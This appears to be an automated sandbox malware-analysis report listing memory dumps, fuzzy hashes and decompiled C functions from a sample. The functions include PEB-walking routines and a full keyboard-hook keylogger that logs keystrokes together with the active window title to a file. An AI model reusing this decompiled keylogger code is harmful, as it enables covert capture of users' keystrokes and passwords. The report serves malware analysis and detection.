                                      0x00000000
                                      0x0043fa50
                                      0x0043fa4a
                                      0x0043fa45
                                      0x0043fa98
                                      0x0043fa9b
                                      0x0043fa9e

                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 940939e4bd13f0287124b6da9b8e99d7d471d9685142fc905d3a88637cfab6e7
                                      • Instruction ID: 13b677296bfc5a4b3f2af3cc5ac641c62cba9006053c75cac9a311d20ebc5edf
                                      • Opcode Fuzzy Hash: 940939e4bd13f0287124b6da9b8e99d7d471d9685142fc905d3a88637cfab6e7
                                      • Instruction Fuzzy Hash: 5E1148327146110A972CA83E4D17067FBCBD3CD110B88A83FE49FCB795E425E70A4A80
                                      Uniqueness

                                      Uniqueness Score: 0.00%

                                      Function 0041F332, Relevance: .1, Instructions: 63COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577668662.00410000.00000040.00000001.sdmp, Offset: 00410000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_410000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 940939e4bd13f0287124b6da9b8e99d7d471d9685142fc905d3a88637cfab6e7
                                      • Instruction ID: 5d7b678f32f471edea6b8f751991fc8f028a3388fbee5f78be4d19bed80609b6
                                      • Opcode Fuzzy Hash: 940939e4bd13f0287124b6da9b8e99d7d471d9685142fc905d3a88637cfab6e7
                                      • Instruction Fuzzy Hash: 5D1148323146150A972C983E4D570A7FBCAD3C9211788893FE8ABCB795E425E74B4680
                                      Uniqueness

                                      Uniqueness Score: 0.00%

                                      Function 0042931C, Relevance: .0, Instructions: 44COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577668662.00410000.00000040.00000001.sdmp, Offset: 00410000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_410000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 52d6af32f81210a7d8c2339af9eb0079fa52d88a47775c7bbb03b4768aeb6e14
                                      • Instruction ID: 7b15328df2af75db559bf259533e4a5d313724d3e5d4247a2dedf55fd82518cf
                                      • Opcode Fuzzy Hash: 52d6af32f81210a7d8c2339af9eb0079fa52d88a47775c7bbb03b4768aeb6e14
                                      • Instruction Fuzzy Hash: 7F01B16A54C6C2EFC7228F34A864043BFB45E8F3143DA2AD9C5D08F193C6119482DB00
                                      Uniqueness

                                      Uniqueness Score: 0.00%

                                      Function 004292E7, Relevance: .0, Instructions: 43COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577668662.00410000.00000040.00000001.sdmp, Offset: 00410000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_410000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: de713413ae30e9bbd629b1ce9e9688af373d2f3a06129fa7c1a59eb67a33a478
                                      • Instruction ID: 7cc2303b56d5d71188f65a3d79b5ccb5c72332d3f4c64af10068287d283dc5cf
                                      • Opcode Fuzzy Hash: de713413ae30e9bbd629b1ce9e9688af373d2f3a06129fa7c1a59eb67a33a478
                                      • Instruction Fuzzy Hash: 4001B16A54C6C2EFC7228F34A460043BFA05E8F3143DA2AD9C5D08F193C6119482DB01
                                      Uniqueness

                                      Uniqueness Score: 0.00%

                                      Function 00CC943A, Relevance: .0, Instructions: 23COMMONLIBRARYCODE
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.578723047.00CC1000.00000020.00020000.sdmp, Offset: 00CC0000, based on PE: true
                                      • Associated: 00000003.00000002.578708562.00CC0000.00000002.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578805483.00CE2000.00000002.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578834966.00CEB000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578847102.00CEC000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578856272.00CED000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578871909.00CEF000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578928306.00D80000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578946601.00D81000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578962758.00D84000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578971084.00D85000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578988900.00D87000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579002903.00D89000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579026291.00D8D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579044316.00D8E000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579062903.00D91000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579083023.00D93000.00000002.00020000.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_cc0000_images.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 69b3ff5fd1344fc2f5de9ce969d2b5a23f5395e665722d9f0df2243ff16b4716
                                      • Instruction ID: 632a706e5a1c833ba47ae9e241841dccfa014f5d826484bcfd59d9f5044c8d9e
                                      • Opcode Fuzzy Hash: 69b3ff5fd1344fc2f5de9ce969d2b5a23f5395e665722d9f0df2243ff16b4716
                                      • Instruction Fuzzy Hash: BBE08C72915228EBC728DBCCD948E9AF3ECEB09B10B15019AF908D3600C270DE00D7D0
                                      Uniqueness

                                      Uniqueness Score: 0.00%

                                      Function 0043E5BE, Relevance: .0, Instructions: 20COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E0043E5BE() {
				intOrPtr* _t10;
				intOrPtr* _t11;

				_t10 =  *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x14;
				_t11 =  *_t10;
				while(_t11 != _t10) {
					if(E0043E67C( *((intOrPtr*)(_t11 + 0x28))) == 0) {
						return  *((intOrPtr*)(_t11 + 0x10));
					}
					_t11 =  *_t11;
				}
				return 0;
			}





                                      0x0043e5c9
                                      0x0043e5cc
                                      0x0043e5de
                                      0x0043e5da
                                      0x00000000
                                      0x0043e5e7
                                      0x0043e5dc
                                      0x0043e5dc
                                      0x00000000

                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 60c1047820937477a62ebe8b3556f1e42973dfa080cef3034b4bd0468cc2296e
                                      • Instruction ID: 54a699f0b59ceb71f229aea482801fb5e28009376276aaa164a769b86927bb4f
                                      • Opcode Fuzzy Hash: 60c1047820937477a62ebe8b3556f1e42973dfa080cef3034b4bd0468cc2296e
                                      • Instruction Fuzzy Hash: 14E08C332025509BC620DB5BD400A57B3B5EB98378F2A186AE44A97681E728FC02CA94
                                      Uniqueness

                                      Uniqueness Score: 0.00%

                                      Function 0041DEFD, Relevance: .0, Instructions: 20COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577668662.00410000.00000040.00000001.sdmp, Offset: 00410000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_410000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 60c1047820937477a62ebe8b3556f1e42973dfa080cef3034b4bd0468cc2296e
                                      • Instruction ID: b5c47114fbbcb4bb190c7ec61b3bf22c24edcb30a80f12f7c1cd8c7b7d671595
                                      • Opcode Fuzzy Hash: 60c1047820937477a62ebe8b3556f1e42973dfa080cef3034b4bd0468cc2296e
                                      • Instruction Fuzzy Hash: 30E08C73A005108BC620DF19D800A92F3F5EF8037072A046AE44793640C328FE83CA58
                                      Uniqueness

                                      Uniqueness Score: 0.00%

                                      Function 0043E8EC, Relevance: .0, Instructions: 11COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E0043E8EC() {
				intOrPtr _t4;

				_t4 =  *[fs:0x30];
				if(_t4 == 0) {
					return 0;
				} else {
					return  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t4 + 0xc)) + 0xc)))))) + 0x18));
				}
			}




                                      0x0043e8ec
                                      0x0043e8f4
                                      0x0043e906
                                      0x0043e8f6
                                      0x0043e903
                                      0x0043e903

                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 1a420be4fd1d60918cb23d9961ed4b3e9e51cbd9e1df09b6748f783962a9c5c8
                                      • Instruction ID: d1913a6f9fc5a84ad08be9e7f2bd37d8c974a8eeaf57f50a506ac35b8a756a5e
                                      • Opcode Fuzzy Hash: 1a420be4fd1d60918cb23d9961ed4b3e9e51cbd9e1df09b6748f783962a9c5c8
                                      • Instruction Fuzzy Hash: ABD0EA78361940CFCB51CF19C584E11B3E4EB49760B098491E905CB771D738EC00EA00
                                      Uniqueness

                                      Uniqueness Score: 0.00%

                                      Function 0041E22B, Relevance: .0, Instructions: 11COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577668662.00410000.00000040.00000001.sdmp, Offset: 00410000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_410000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 1a420be4fd1d60918cb23d9961ed4b3e9e51cbd9e1df09b6748f783962a9c5c8
                                      • Instruction ID: e4bd3f95ac7834bea822284dbbfe6242d103d250b8690896264215d9e20352ae
                                      • Opcode Fuzzy Hash: 1a420be4fd1d60918cb23d9961ed4b3e9e51cbd9e1df09b6748f783962a9c5c8
                                      • Instruction Fuzzy Hash: 2CD0EA387619408FCB51CF19C594E01B3E4EB49760B0984D1E905CB731D738ED40EA40
                                      Uniqueness

                                      Uniqueness Score: 0.00%

                                      Function 0043E5B7, Relevance: .0, Instructions: 2COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E0043E5B7() {

				return  *[fs:0x30];
			}



                                      0x0043e5bd

                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                      • Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
                                      • Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                      • Instruction Fuzzy Hash:
                                      Uniqueness

                                      Uniqueness Score: 0.00%

                                      Function 0041DEF6, Relevance: .0, Instructions: 2COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577668662.00410000.00000040.00000001.sdmp, Offset: 00410000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_410000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                      • Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
                                      • Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                      • Instruction Fuzzy Hash:
                                      Uniqueness

                                      Uniqueness Score: 0.00%

                                      Function 0043765A, Relevance: 56.3, APIs: 17, Strings: 15, Instructions: 286keyboardUNIQUE
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E0043765A(signed int __ecx, int __edx, long _a4) {
				signed int _v8;
				int _v12;
				short _v24;
				short _v56;
				void* _t21;
				short _t24;
				short _t27;
				void* _t36;
				int _t46;
				signed int _t48;
				WCHAR* _t49;
				WCHAR* _t50;
				long _t57;
				void* _t58;
				short _t59;
				short _t60;
				short _t62;
				short _t63;
				short _t64;
				short _t66;
				short _t67;
				short _t69;
				short _t70;
				short _t71;
				short _t73;
				short _t75;
				short _t77;
				short _t78;
				short _t79;
				signed int _t81;

				_t55 = __edx;
				_t48 = __ecx;
				_t46 = __ecx;
				_v12 = __edx;
				_v8 = __ecx;
				_t57 = _a4;
				_t21 = __edx - 0x100;
				if(_t21 == 0 || _t21 == 4) {
					_t58 =  *_t57;
					if(_t58 < 0x27) {
						__eflags = _t58 - 0x40;
						if(_t58 <= 0x40) {
							L21:
							__eflags = _t58 - 0x66;
							if(__eflags > 0) {
								__eflags = _t58 - 0xbc;
								if(__eflags > 0) {
									__eflags = _t58 - 0xdb;
									if(__eflags > 0) {
										_t59 = _t58 - 0xdc;
										__eflags = _t59;
										if(_t59 == 0) {
											_t24 = GetAsyncKeyState(0x10);
											_t49 = "|";
											__eflags = _t24;
											if(__eflags == 0) {
												_t49 = "\\";
											}
											L99:
											E00437AEB(_t49, _t55, _t90);
											goto L100;
										}
										_t60 = _t59 - 1;
										__eflags = _t60;
										if(_t60 == 0) {
											_t27 = GetAsyncKeyState(0x10);
											_t50 = "}";
											_t55 = "]";
											L76:
											__eflags = _t27;
											_t49 =  ==  ? _t55 : _t50;
											goto L99;
										}
										__eflags = _t60 - 1;
										if(__eflags == 0) {
											_t27 = GetAsyncKeyState(0x10);
											_t50 = "\"";
											_t55 = "\'";
											goto L76;
										}
										L94:
										GetKeyNameTextW((( *(_t57 + 8) << 8) +  *((intOrPtr*)(_t57 + 4)) << 0x10) + 1,  &_v56, 0xf);
										_t49 =  &_v56;
										goto L99;
									}
									if(__eflags == 0) {
										_t27 = GetAsyncKeyState(0x10);
										_t50 = "{";
										_t55 = "[";
										goto L76;
									}
									_t62 = _t58 - 0xbd;
									__eflags = _t62;
									if(_t62 == 0) {
										_t27 = GetAsyncKeyState(0x10);
										_t50 = "_";
										_t55 = "-";
										goto L76;
									}
									_t63 = _t62 - 1;
									__eflags = _t63;
									if(_t63 == 0) {
										_t27 = GetAsyncKeyState(0x10);
										_t50 = ">";
										_t55 = ".";
										goto L76;
									}
									_t64 = _t63 - 1;
									__eflags = _t64;
									if(_t64 == 0) {
										_t27 = GetAsyncKeyState(0x10);
										_t50 = "?";
										_t55 = "/";
										goto L76;
									}
									__eflags = _t64 - 1;
									if(__eflags != 0) {
										goto L94;
									}
									_t27 = GetAsyncKeyState(0x10);
									_t50 = "~";
									_t55 = "`";
									goto L76;
								}
								if(__eflags == 0) {
									_t27 = GetAsyncKeyState(0x10);
									_t50 = "<";
									_t55 = ",";
									goto L76;
								}
								__eflags = _t58 - 0xa3;
								if(_t58 > 0xa3) {
									__eflags = _t58 - 0xa5;
									if(__eflags <= 0) {
										L78:
										_t49 = L"[ALT]";
										goto L99;
									}
									__eflags = _t58 - 0xba;
									if(_t58 == 0xba) {
										_t27 = GetAsyncKeyState(0x10);
										_t50 = ":";
										_t55 = ";";
										goto L76;
									}
									__eflags = _t58 - 0xbb;
									if(__eflags != 0) {
										goto L94;
									}
									_t27 = GetAsyncKeyState(0x10);
									_t50 = "+";
									_t55 = "=";
									goto L76;
								}
								__eflags = _t58 - 0xa2;
								if(__eflags >= 0) {
									L71:
									_t49 = L"[CTRL]";
									goto L99;
								}
								__eflags = _t58 - 0x67;
								if(__eflags == 0) {
									_t49 = "7";
									goto L99;
								}
								__eflags = _t58 - 0x68;
								if(__eflags == 0) {
									_t49 = "8";
									goto L99;
								}
								__eflags = _t58 - 0x69;
								if(__eflags == 0) {
									_t49 = "9";
									goto L99;
								}
								__eflags = _t58 - 0xa0 - 1;
								if(__eflags > 0) {
									goto L94;
								}
								goto L100;
							}
							if(__eflags == 0) {
								_t49 = "6";
								goto L99;
							}
							__eflags = _t58 - 0x20;
							if(__eflags > 0) {
								__eflags = _t58 - 0x62;
								if(__eflags > 0) {
									_t66 = _t58 - 0x63;
									__eflags = _t66;
									if(__eflags == 0) {
										_t49 = "3";
										goto L99;
									}
									_t67 = _t66 - 1;
									__eflags = _t67;
									if(__eflags == 0) {
										_t49 = "4";
										goto L99;
									}
									__eflags = _t67 - 1;
									if(__eflags != 0) {
										goto L94;
									}
									_t49 = "5";
									goto L99;
								}
								if(__eflags == 0) {
									_t49 = "2";
									goto L99;
								}
								_t69 = _t58 - 0x2d;
								__eflags = _t69;
								if(__eflags == 0) {
									_t49 = L"[INSERT]";
									goto L99;
								}
								_t70 = _t69 - 1;
								__eflags = _t70;
								if(__eflags == 0) {
									_t49 = L"[DEL]";
									goto L99;
								}
								_t71 = _t70 - 0x32;
								__eflags = _t71;
								if(__eflags == 0) {
									_t49 = "0";
									goto L99;
								}
								__eflags = _t71 - 1;
								if(__eflags != 0) {
									goto L94;
								}
								_t49 = "1";
								goto L99;
							}
							if(__eflags == 0) {
								_t49 = " ";
								goto L99;
							}
							__eflags = _t58 - 0x11;
							if(__eflags > 0) {
								_t73 = _t58 - 0x12;
								__eflags = _t73;
								if(__eflags == 0) {
									goto L78;
								}
								_t75 = _t73;
								__eflags = _t75;
								if(__eflags == 0) {
									_t49 = L"[CAPS]";
									goto L99;
								}
								__eflags = _t75 - 7;
								if(__eflags != 0) {
									goto L94;
								}
								_t49 = L"[ESC]";
								goto L99;
							}
							if(__eflags == 0) {
								goto L71;
							}
							_t77 = _t58 - 8;
							__eflags = _t77;
							if(__eflags == 0) {
								_t49 = L"[BKSP]";
								goto L99;
							}
							_t78 = _t77 - 1;
							__eflags = _t78;
							if(__eflags == 0) {
								_t49 = L"[TAB]";
								goto L99;
							}
							_t79 = _t78 - 4;
							__eflags = _t79;
							if(__eflags == 0) {
								_t49 = L"[ENTER]\r\n";
								goto L99;
							}
							__eflags = _t79 - 3;
							if(__eflags == 0) {
								goto L100;
							}
							goto L94;
						}
						L19:
						__eflags = _t58 - 0x5b;
						if(_t58 >= 0x5b) {
							goto L21;
						}
						_t36 = E00437AE0();
						__eflags = GetAsyncKeyState(0x10);
						__eflags = E00437ACE(_t48 & 0xffffff00 | GetAsyncKeyState(0x10) != 0x00000000, _t36);
						_t53 =  !=  ? _t58 : _t58 + 0x20;
						wsprintfW( &_v24, L"%c",  !=  ? _t58 : _t58 + 0x20);
						E00437AEB( &_v24, _t36, __eflags);
						_t46 = _v8;
						goto L100;
					}
					if(_t58 > 0x40) {
						goto L19;
					}
					if(GetAsyncKeyState(0x10) == 0) {
						wsprintfW( &_v24, L"%c", _t58);
						_t49 =  &_v24;
						goto L99;
					}
					_t81 = _t58 + 0xffffffd0;
					_t90 = _t81 - 9;
					if(_t81 > 9) {
						goto L100;
					}
					switch( *((intOrPtr*)(_t81 * 4 +  &M00437AA6))) {
						case 0:
							_t49 = ")";
							goto L99;
						case 1:
							__ecx = "!";
							goto L99;
						case 2:
							__ecx = "@";
							goto L99;
						case 3:
							__ecx = "#";
							goto L99;
						case 4:
							__ecx = "$";
							goto L99;
						case 5:
							__ecx = "%";
							goto L99;
						case 6:
							__ecx = "^";
							goto L99;
						case 7:
							__ecx = "&";
							goto L99;
						case 8:
							__ecx = "*";
							goto L99;
						case 9:
							__ecx = "(";
							goto L99;
					}
				} else {
					L100:
					return CallNextHookEx(0, _t46, _v12, _t57);
				}
			}

































                                      0x0043765a
                                      0x0043765a
                                      0x00437663
                                      0x00437666
                                      0x00437669
                                      0x0043766d
                                      0x00437670
                                      0x00437675
                                      0x00437680
                                      0x00437685
                                      0x00437733
                                      0x00437736
                                      0x00437784
                                      0x00437784
                                      0x00437787
                                      0x004378a7
                                      0x004378a9
                                      0x00437980
                                      0x00437982
                                      0x00437a15
                                      0x00437a15
                                      0x00437a1b
                                      0x00437a76
                                      0x00437a7c
                                      0x00437a81
                                      0x00437a84
                                      0x00437a86
                                      0x00437a86
                                      0x00437a8b
                                      0x00437a8b
                                      0x00000000
                                      0x00437a8b
                                      0x00437a1d
                                      0x00437a1d
                                      0x00437a20
                                      0x00437a5f
                                      0x00437a65
                                      0x00437a6a
                                      0x0043793e
                                      0x0043793e
                                      0x00437941
                                      0x00000000
                                      0x00437941
                                      0x00437a22
                                      0x00437a25
                                      0x00437a48
                                      0x00437a4e
                                      0x00437a53
                                      0x00000000
                                      0x00437a53
                                      0x00437a27
                                      0x00437a3b
                                      0x00437a41
                                      0x00000000
                                      0x00437a41
                                      0x00437988
                                      0x00437a00
                                      0x00437a06
                                      0x00437a0b
                                      0x00000000
                                      0x00437a0b
                                      0x0043798a
                                      0x0043798a
                                      0x00437990
                                      0x004379e9
                                      0x004379ef
                                      0x004379f4
                                      0x00000000
                                      0x004379f4
                                      0x00437992
                                      0x00437992
                                      0x00437995
                                      0x004379d2
                                      0x004379d8
                                      0x004379dd
                                      0x00000000
                                      0x004379dd
                                      0x00437997
                                      0x00437997
                                      0x0043799a
                                      0x004379bb
                                      0x004379c1
                                      0x004379c6
                                      0x00000000
                                      0x004379c6
                                      0x0043799c
                                      0x0043799f
                                      0x00000000
                                      0x00000000
                                      0x004379a7
                                      0x004379ad
                                      0x004379b2
                                      0x00000000
                                      0x004379b2
                                      0x004378af
                                      0x00437969
                                      0x0043796f
                                      0x00437974
                                      0x00000000
                                      0x00437974
                                      0x004378b5
                                      0x004378bb
                                      0x00437910
                                      0x00437916
                                      0x0043795d
                                      0x0043795d
                                      0x00000000
                                      0x0043795d
                                      0x00437918
                                      0x0043791e
                                      0x0043794b
                                      0x00437951
                                      0x00437956
                                      0x00000000
                                      0x00437956
                                      0x00437920
                                      0x00437926
                                      0x00000000
                                      0x00000000
                                      0x0043792e
                                      0x00437934
                                      0x00437939
                                      0x00000000
                                      0x00437939
                                      0x004378bd
                                      0x004378c3
                                      0x00437906
                                      0x00437906
                                      0x00000000
                                      0x00437906
                                      0x004378c5
                                      0x004378c8
                                      0x004378fc
                                      0x00000000
                                      0x004378fc
                                      0x004378ca
                                      0x004378cd
                                      0x004378f2
                                      0x00000000
                                      0x004378f2
                                      0x004378cf
                                      0x004378d2
                                      0x004378e8
                                      0x00000000
                                      0x004378e8
                                      0x004378da
                                      0x004378dd
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x004378e3
                                      0x0043778d
                                      0x00437898
                                      0x00000000
                                      0x00437898
                                      0x00437793
                                      0x00437796
                                      0x00437816
                                      0x00437819
                                      0x00437867
                                      0x00437867
                                      0x0043786a
                                      0x0043788e
                                      0x00000000
                                      0x0043788e
                                      0x0043786c
                                      0x0043786c
                                      0x0043786f
                                      0x00437884
                                      0x00000000
                                      0x00437884
                                      0x00437871
                                      0x00437874
                                      0x00000000
                                      0x00000000
                                      0x0043787a
                                      0x00000000
                                      0x0043787a
                                      0x0043781b
                                      0x0043785d
                                      0x00000000
                                      0x0043785d
                                      0x0043781d
                                      0x0043781d
                                      0x00437820
                                      0x00437853
                                      0x00000000
                                      0x00437853
                                      0x00437822
                                      0x00437822
                                      0x00437825
                                      0x00437849
                                      0x00000000
                                      0x00437849
                                      0x00437827
                                      0x00437827
                                      0x0043782a
                                      0x0043783f
                                      0x00000000
                                      0x0043783f
                                      0x0043782c
                                      0x0043782f
                                      0x00000000
                                      0x00000000
                                      0x00437835
                                      0x00000000
                                      0x00437835
                                      0x00437798
                                      0x0043780c
                                      0x00000000
                                      0x0043780c
                                      0x0043779a
                                      0x0043779d
                                      0x004377e0
                                      0x004377e0
                                      0x004377e3
                                      0x00000000
                                      0x00000000
                                      0x004377ea
                                      0x004377ea
                                      0x004377ed
                                      0x00437802
                                      0x00000000
                                      0x00437802
                                      0x004377ef
                                      0x004377f2
                                      0x00000000
                                      0x00000000
                                      0x004377f8
                                      0x00000000
                                      0x004377f8
                                      0x0043779f
                                      0x00000000
                                      0x00000000
                                      0x004377a5
                                      0x004377a5
                                      0x004377a8
                                      0x004377d6
                                      0x00000000
                                      0x004377d6
                                      0x004377aa
                                      0x004377aa
                                      0x004377ad
                                      0x004377cc
                                      0x00000000
                                      0x004377cc
                                      0x004377af
                                      0x004377af
                                      0x004377b2
                                      0x004377c2
                                      0x00000000
                                      0x004377c2
                                      0x004377b4
                                      0x004377b7
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x004377bd
                                      0x00437738
                                      0x00437738
                                      0x0043773b
                                      0x00000000
                                      0x00000000
                                      0x0043773d
                                      0x0043774c
                                      0x00437759
                                      0x00437761
                                      0x0043776b
                                      0x00437777
                                      0x0043777c
                                      0x00000000
                                      0x0043777c
                                      0x0043768e
                                      0x00000000
                                      0x00000000
                                      0x0043769f
                                      0x00437722
                                      0x0043772b
                                      0x00000000
                                      0x0043772b
                                      0x004376a1
                                      0x004376a4
                                      0x004376a7
                                      0x00000000
                                      0x00000000
                                      0x004376ad
                                      0x00000000
                                      0x004376b4
                                      0x00000000
                                      0x00000000
                                      0x004376be
                                      0x00000000
                                      0x00000000
                                      0x004376c8
                                      0x00000000
                                      0x00000000
                                      0x004376d2
                                      0x00000000
                                      0x00000000
                                      0x004376dc
                                      0x00000000
                                      0x00000000
                                      0x004376e6
                                      0x00000000
                                      0x00000000
                                      0x004376f0
                                      0x00000000
                                      0x00000000
                                      0x004376fa
                                      0x00000000
                                      0x00000000
                                      0x00437704
                                      0x00000000
                                      0x00000000
                                      0x0043770e
                                      0x00000000
                                      0x00000000
                                      0x00437a90
                                      0x00437a90
                                      0x00437aa1
                                      0x00437aa1

                                      APIs
                                      • GetAsyncKeyState.USER32(00000010), ref: 00437696
                                      • CallNextHookEx.USER32(00000000,?,?,?), ref: 00437A97
                                        • Part of subcall function 00437AEB: GetForegroundWindow.USER32 ref: 00437B14
                                        • Part of subcall function 00437AEB: GetWindowTextW.USER32(00000000,?,00000104), ref: 00437B27
                                        • Part of subcall function 00437AEB: lstrlenW.KERNEL32(-00000210,{Unknown},?,?), ref: 00437B90
                                        • Part of subcall function 00437AEB: CreateFileW.KERNEL32(?,00000004,00000001,00000000,00000004,00000080,00000000), ref: 00437BFE
                                        • Part of subcall function 00437AEB: lstrlenW.KERNEL32(004429A0,00000008,00000000,?,?), ref: 00437C27
                                        • Part of subcall function 00437AEB: WriteFile.KERNEL32(?,004429A0,00000000,?,?), ref: 00437C33
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: FileWindowlstrlen$AsyncCallCreateForegroundHookNextStateTextWrite
                                      • String ID: D&D$[ALT]$[BKSP]$[CAPS]$[CTRL]$[DEL]$[ENTER]$[ESC]$[INSERT]$[TAB]$|*D$*D$*D$*D$*D
                                      • API String ID: 2452648998-840773365
                                      • Opcode ID: 73d1c7d664325cbde4d1cc3a340fc9e6f6c49df9da99b8f92495fb75de3c1881
                                      • Instruction ID: 1e34032bf513de26f9a8765f6988a01378d18145d1f7904321486f9cdeb8a926
